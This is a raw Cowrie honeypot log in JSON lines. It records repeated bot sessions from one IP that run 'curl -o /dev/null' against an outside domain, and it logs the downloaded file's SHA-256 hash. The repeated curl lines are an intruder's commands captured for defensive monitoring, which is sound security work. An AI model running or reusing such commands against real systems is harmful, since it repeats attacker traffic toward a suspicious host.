{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.111006Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.115324Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.154950Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.178038Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.178897Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.182775Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.183985Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.185213Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.188654Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.191200Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.194628Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.195461Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.198419Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.200979Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.230425Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.231394Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.234930Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.235788Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.240525Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.272588Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.274794Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.275694Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.276214Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.278939Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.279638Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.283248Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.284574Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.286104Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.288400Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.319034Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.319788Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.327621Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.328443Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.330449Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.331206Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.362300Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.363157Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.367539Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.370073Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.375375Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.381485Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.382967Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.383870Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.385984Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.386753Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.390447Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.420708Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.421480Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.428081Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.428967Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.433013Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.433570Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.464734Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.465541Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.469474Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.472798Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.476434Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.480294Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.484351Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.485119Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.488033Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.488752Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.518920Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.520466Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.521326Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.525115Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.548599Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.549474Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.552790Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.553412Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.557429Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.560806Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.563467Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.565953Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.566774Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.623410Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.625415Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:56.627203Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.629128Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:56.634143Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
